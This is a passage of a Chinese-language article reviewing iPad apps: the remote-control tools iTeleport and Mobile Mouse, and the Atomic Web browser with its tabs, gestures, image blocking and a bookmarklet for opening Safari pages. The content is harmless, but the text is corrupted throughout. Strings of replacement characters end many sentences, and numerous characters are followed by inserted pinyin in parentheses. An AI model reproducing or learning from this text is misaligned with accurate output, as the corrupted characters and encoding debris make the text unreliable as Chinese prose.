所有這3種工具都提供類似的功能,你可以使用手勢幫助輸入���。iTeleport包含較多的鍵盤選項(xiàng),例如控制媒體應(yīng)用程序,但是,我認(rèn)為其實(shí)現(xiàn)不太方便�����。
如果你只是想坐下來休息一下,并且控制一臺(tái)計(jì)算機(jī)來收看電視,Mobile Mouse (3美元)可以把你的iPad變成一個(gè)無線鍵盤���、多觸點(diǎn)鼠標(biāo)跟蹤板和媒體遙控器。
加速瀏覽器
從真正的標(biāo)簽開始,Atomic Web(1美元)添加了很多類似桌面的優(yōu)點(diǎn)�����。多觸點(diǎn)揮動(dòng)手勢甚至可以在打開的站點(diǎn)之間切換��。但是,這只是開始��。Atomic Web瀏覽器可以有選擇地忽略掉圖像,從而節(jié)省帶寬; 將其自身標(biāo)示為各種桌面瀏覽器,讓你定制搜索引擎; 甚至在一個(gè)頁面中搜索文本,修改其按鈕等等��。
遺憾的是,Safari被作為iPad的默認(rèn)瀏覽器���。然而,我們可以創(chuàng)建一個(gè)標(biāo)簽,在Atomic Web瀏覽器中重載一個(gè)Safari頁面���。在Atomic Web Browser Settings菜單里,點(diǎn)擊Install Bookmarklet,就會(huì)打開Safari并展示這一過程���。
